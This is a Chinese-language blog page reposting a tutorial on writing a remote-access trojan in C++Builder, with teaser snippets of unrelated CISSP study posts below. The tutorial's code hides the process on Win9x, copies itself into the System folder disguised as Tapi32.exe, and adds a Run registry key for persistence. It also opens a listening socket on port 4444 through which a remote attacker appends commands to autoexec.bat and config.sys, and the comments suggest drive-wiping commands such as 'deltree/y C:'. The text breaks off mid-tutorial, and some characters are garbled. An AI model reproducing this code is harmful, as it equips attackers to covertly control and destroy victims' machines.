跳到主要內容

木馬是如何編寫的

木馬是如何編寫的







特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公佈Back Orifice以來,木馬猶如



平地上的驚雷, 使在Dos——Windows時代中長大的中國線人從五彩繽紛的網路之夢中驚醒,終於認識到



的網路也有它邪惡的一面,一時間人心惶惶。



  我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著



覺、上不了網,到處求救!要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分



盛行的年代,木馬是由一些玩程式(主要是C)水準很高的年輕人(主要是老美)用C或Shell語言編寫的



,基本是用來竊取登入主機的密碼,以取得更高的權限。那時木馬的主要方法是誘騙——先修改你



的.profile文件,植入木馬;當你登入時將你敲入的密碼字串存入一個文件,用Email的形式發到攻擊者



的郵信箱裡。國內的年輕人大都是在盜版Dos的熏陶下長大的,對網路可以說很陌生。直到Win9x橫空出世,



尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可



以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話視窗可以看到工作)給了當時中國人極大的震撼,它



在中國的網路安全方面可以說是一個劃時代的軟體。



  自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成——伺服器程序(Server)和客戶



端程序(Client),伺服器負責開啟攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一



定的網路傳輸協定來進行通訊(一般是TCP/IP傳輸協定)。為了讓大家更好的瞭解木馬攻擊技術,破除木馬的神秘



感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和



未知的木馬。



  首先是編程工具的選項。目前流行的開發工具有C++Builder、VC、VB和Delphi,這裡我們選用



C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太複雜,為了更好地突出我的例子,集中注意力在木



馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜



」黑客小組公佈的BO2000來源碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談——難道你還給受害者



傳一個1兆多的動態連接庫——Msvbvm60.dll嗎?



啟動C++Builder 5.0企業版,新增一個工程,增加三個VCL控件:一個是Internet頁中的Server Socket,



另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可



以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將?o?憡w薟indows中(包括



Win98和WinNt);後兩個控件的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸傳輸協定)和



SMTP(Simple Mail Transfer Protocol簡單郵件傳輸傳輸協定)功能,大家一看都知道是使軟體具有上傳下



載功能和發郵件功能的控件。



  Form表單是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而



且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過



程實現的小程序一般只有17K左右那樣。



  我們首先應該讓我們的程序能夠隱身。雙按Form,首先在FormCreate事件中增加可使木馬在Win9x的



「關閉程序」對話視窗中隱藏的程式碼。這看起來很神秘,其實說穿了不過是一種被稱之為Service的後台進



程,它可以執行在較高的優先等級下,可以說是非常靠近系統核心的設備驅動程式中的那一種。因此,只要將



我們的程序在工作資料庫中用RegisterServiceProcess()函數註冊成服務工作(Service Process)就



可以了。不過該函數的宣告在Borland預先打包的頭文件中沒有,那麼我們只好自己來宣告這個位於



KERNEL32.DLL中的鳥函數了。



  首先判斷目標機的作業系統是Win9x還是WinNt:



{

DWORD dwVersion = GetVersion();

// 得到作業系統的版本號

if (dwVersion >= 0x80000000)

// 作業系統是Win9x,不是WinNt

 {

   typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

    //定義RegisterServiceProcess()函數的原型

    HINSTANCE hDLL;

   LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

   hDLL = LoadLibrary("KERNEL32");

   //載入RegisterServiceProcess()函數所在的動態連接庫KERNEL32.DLL

   lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress



(hDLL,"RegisterServiceProcess");

    //得到RegisterServiceProcess()函數的位址

    lpRegisterServiceProcess(GetCurrentProcessId(),1);

   //執行RegisterServiceProcess()函數,隱藏本工作

   FreeLibrary(hDLL);

   //卸載動態連接庫

 }

}



  這樣就終於可以隱身了(害我敲了這麼多程式碼!)。為什麼要判斷作業系統呢?因為WinNt中的工作



管理器可以對當繼續程一覽無餘,因此沒必要在WinNt下也使用以上程式碼(不過你可以使用其他的方法,



這個留到後面再講)。





接著再將自己拷貝一份到%System%目錄下,例如:C:\Windows\System,並修改註冊表,以便啟動時自動



載入:



{ 

char TempPath[MAX_PATH];

//定義一個變數

GetSystemDirectory(TempPath ,MAX_PATH);

//TempPath是system目錄緩衝區的位址,MAX_PATH是緩衝區的大小,得到目標機的System目錄路徑

SystemPath=AnsiString(TempPath);

//格式化TempPath字串串,使之成為能供編譯器使用的樣式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE



);

//將自己拷貝到%System%目錄下,並改名為Tapi32.exe,偽裝起來

Registry=new TRegistry;

//定義一個TRegistry對象,準備修改註冊表,這一步必不可少

Registry->RootKey=HKEY_LOCAL_MACHINE;

//設定主鍵為HKEY_LOCAL_MACHINE

Registry->OpenKey("Software\\Microsoft\\Windows\\

CurrentVersion\\Run",TRUE);

//開啟鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就新增之

try

 {

  //如果以下語句發生異常,跳至catch,以避免程序崩潰

  if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

    Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");

    //尋找是否有「crossbow」字樣的鍵值,並且是否為拷貝的目錄%System%+Tapi32.exe

   //如果不是,就寫入以上鍵值和內容

 }

catch(...)

 {

 //如果有錯誤,什麼也不做

 }

}



  好,FormCreate程序完成了,這樣每次啟動都可以自動載入Tapi32.exe,並且在「關閉程序」對話視窗



中看不見本工作了,木馬的雛形初現。



  接著選ServerSocket控件,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打



開特定連接阜,處於伺服器工作狀態。再將Port填入4444,這是木馬的連接阜號,當然你也可以用別的。但是



你要注意不要用1024以下的低端連接阜,因為這樣不但可能會與基本網路傳輸協定使用的連接阜相衝突,而且很容



易被發覺,因此盡量使用1024以上的高端連接阜(不過也有這樣一種技術,它故意使用特定連接阜,因為如果



引起衝突,Windows也不會報告錯誤 ^_^)。你可以看一看TNMFTP控件使用的連接阜,是21號連接阜,這是FTP傳輸協定



的專用控制連接阜(FTP Control Port);同理TNMSMTP的25號連接阜也是SMTP傳輸協定的專用連接阜。



  再選ServerSocket控件,點擊Events頁,雙按OnClientRead事件,敲入以下程式碼:



{

 FILE *fp=NULL;

 char * content;

 int times_of_try;

 char TempFile[MAX_PATH];

 //定義了一堆待會兒要用到的變數

 sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str())



;

 //在%System%下建立一個文本文件Win369.bat,作為臨時文件使用

 AnsiString temp=Socket->ReceiveText();

 //接收客戶端(攻擊者,也就是你自己)傳來的資料

}





好,大門敞開了!接著就是修改目標機的各種組態了!^_^ 首先我們來修改Autoexec.bat和Config.sys吧







{

if(temp.SubString(0,9)=="edit conf")

 //如果接受到的字串串的前9個字串是「edit conf」

 {

   int number=temp.Length();

   //得到字串串的長度

   int file_name=atoi((temp.SubString(11,1)).c_str());

   //將第11個字串轉換成integer型,存入file_name變數

   //為什麼要取第11個字串,因為第10個字串是空格字串

   content=(temp.SubString(12,number-11)+'\n').c_str();

   //餘下的字串串將被作為寫入的內容寫入目標文件

   FILE *fp=NULL;

   char filename[20];

   chmod("c:\\autoexec.bat",S_IREAD|S_IWRITE);

   chmod("c:\\config.sys",S_IREAD|S_IWRITE);

   //將兩個目標文件的內容改為可讀可寫

   if(file_name==1)

    sprintf(filename,"%s","c:\\autoexec.bat");

    //如果第11個字串是1,就把Autoexec.bat格式化

   else if(file_name==2)

    sprintf(filename,"%s","c:\\config.sys");

    //如果第11個字串是1,就把Config.sys格式化

   times_of_try=0;

   //定義計數器

   while(fp==NULL)

    {

     //如果游標是空

    fp=fopen(filename,"a+");

    //如果文件不存在,新增之;如果存在,準備在其後增加

    //如果出現錯誤,文件游標為空,這樣就會重複

    times_of_try=times_of_try+1;

    //計數器加1

    if(times_of_try>100)

    {

       //如果已經試了100次了,仍未成功

       Socket->SendText("Fail By Open File");

       //就發回「Fail By Open File」的錯誤訊息

       goto END;

       //跳至END處

    }

    }

   fwrite(content,sizeof(char),strlen(content),fp);

   //寫入增加的語句,例如deltree/y C:或者format/q/autotest C:,夠毒吧?!

   fclose(fp);

   //寫完後關閉目標文件

   Socket->SendText("Sucess");

   //然後發回「Success」的成功訊息

  }

}



  你現在可以通過網路來察看目標機上的這兩個文件了,並且還可以向裡面隨意增加任何指令。哈哈,

留言

這個網誌中的熱門文章

WUSON的CISSP課後筆記整理-葉柏毅Alex Yeh

  CISSP考試心得-Alex Yeh 心智圖 心智圖PDF Structure Architecture Framework Approach Methodology Domain 口訣 Domain 1. Security and Risk Management   C、I、A+GRC(安全和風險管理) Domain 2. Asset Security   盤點、分類、保護(資產安全) Domain 3. Security Architecture and Engineering   時時都安全、處處都安全(安全架構和工程) Domain 4. Communication and Network Security   處處都安全(通信及網路安全) Domain 5. Identity and Access Management (IAM)   I + 3A(身分識別及存取控制) Domain 6. Security Assessment and Testing   查驗、訪談、測試(安全評鑑及測試) Domain 7. Security Operations   日常維運、持續改善(安全維運) Domain 8. Software Development Security   時時都安全、處處都安全(軟體開發安全) 美國法定目標(FISMA)/ 資通安全法 CIA C機密性:資料不被偷 I完整性:資料不被竄改 A可用性:資料隨時可用 Integrity完整性 Data Integrity(資料完整性) Authenticity(資料真偽;真實性) Non-repudiation 不可否認性(法律上):傳送方不能否認未傳收;接受方不能否認未收到。 FISMA NIST FIPS 199 NIST SP 800 資產Asset:有價值Value的東西,且值得保護 Assets 通常指資訊系統 資料 電腦系統 操作系統 軟體 網路 資料中心(機房) 人(最重要) 業務流程 資安目標(定義): 透過安全管制措施,保護資訊資產不受到危害,以達到CIA目標 進而支持組織的業務流程 將安全融入組織業務流程(人事/採購),產銷人發財 支持組織的「產品」及「服務」持續交付 為公司創造價值,實現公司的使命及願景 公司最高經營階層的管理作為就叫做治理. 管理是達成目標的一套有系統的

[補充]Common Attacks

  參考來源: Wuson - Common-attacks  , Wiki 如翻譯或解釋有誤,歡迎提出更正。 Brute force: 蠻力攻擊 (英語:Brute-force attack) ,又稱為 窮舉攻擊 (英語:Exhaustive attack)或 暴力破解 ,是一種 密碼分析 的方法,即將密碼進行逐個推算直到找出真正的密碼為止。 Advanced Persistent Threat (APT) :高級長期威脅(英語:advanced persistent threat,縮寫:APT),又稱高級持續性威脅、先進持續性威脅等,是指隱匿而持久的電腦入侵過程,通常由某些人員精心策劃,針對特定的目標。其通常是出於商業或政治動機,針對特定組織或國家,並要求在長時間內保持高隱蔽性。高級長期威脅包含三個要素:高級、長期、威脅。高級強調的是使用複雜精密的惡意軟體及技術以利用系統中的漏洞。長期暗指某個外部力量會持續監控特定目標,並從其獲取數據。威脅則指人為參與策劃的攻擊。 Multi-vector, polymorphic attacks Buffer Overflows: 緩衝區溢位 (buffer overflow),在 電腦學 上是指標對 程式設計 缺陷,向程式輸入 緩衝區 寫入使之溢位的內容(通常是超過緩衝區能儲存的最巨量資料量的資料),從而破壞程式執行、趁著中斷之際並取得程式乃至系統的控制權。 Mobile Code: ActiveX, JavaApplet, Flash, JavaScript Malicious Software (Malware) Drive-by download attacks: 路過式下載 ,網頁掛馬攻擊 (Drive-by Downloads) Spyware Trojan Horse Keyloggers Password Crackers Spoofing欺騙 Masquerading,偽裝 Sniffers,竊聽 Eavesdropping,竊聽(隔牆有耳) Tapping,竊聽 Emanations 流出 and TEMPEST Spontaneous emission of electromagnetic radiation” (EMR) subject to TEMPEST eavesdropping 受 TEMPE

The Effective CISSP考試攻略

  資料來源: https://wentzwu.com/the-effective-cissp%e8%80%83%e8%a9%a6%e6%94%bb%e7%95%a5/ The Effective CISSP考試攻略 考試的難易 一個好的考試,通常會讓你準備的很辛苦!但通過考試後會讓你一直駡,怎麼考出來的題目沒有想像中難!但這就是一個好的考試!這種考試通常有一定的門檻及鑑別度。 到2020/07/01止,台灣有337位CISSP;2019/05/31是304位;2018/12/31是287位。 即使您在資訊軟體產業有相當的資歷,或已有資安的經驗,仍請不要忽視CISSP考試對資安治理、管理及技術的涵蓋面與勺鑽度。 一般而言,有十年以上工作經驗的朋友,可以將考試的目標訂在: 三個月到一年內 , 投入250小時到1000小時 作題目不少於2500題 考試的掌握度 CISSP考試大綱 要儘可能弄懂、裏頭的專有名詞不可以有看不懂的;必須能達到看得懂、說得出,並搭配作題目2500題以上,才能達到參加CISSP考試的基本門檻了。 作題目的最低標準:課本提供的線上題庫的全部題目,外加其它題庫1500題以上,都必須達到90%以上的水準。 答題技巧 考試的作答,基本上要以官方CBK、指定教材及NIST的指引為準。 除了K書,答題的技巧也要刻意練習及培養。 CISSP考試的題目,基本上都是透過社群運作,讓大家參與出題,所以題庫很大並且不斷在更新。因此,請著重在觀念的理解,力求以實力考過,不要迷信題目作很多或作考古題就會過。 應考策略 建議選擇在週一請假,並選在下午考試。 週六及週日可以用大塊的時間準備考試,讓自己進入戰鬥狀態。 睡個好眠後,週一上午持續複習;讓自己一直處於考試的戰鬥狀態。 下午考試當天,我個人不喝有刺激性的飲料(如咖啡)、習慣補一顆維他命B群(或考試前一個小時補充液態維他命),以及中午只吃輕食;進入考場前會先至洗手間用肥皂液洗手、深呼吸及舒展筋骨。 考試作答 作答時先刪去不可能的答案,再選一個對的或 最佳的 答案。 若是考簡體中文,不確定的題目可以標記(mark)起來,繼續作下一題,最後再回來作答。 若是考新版的英文試(CAT 1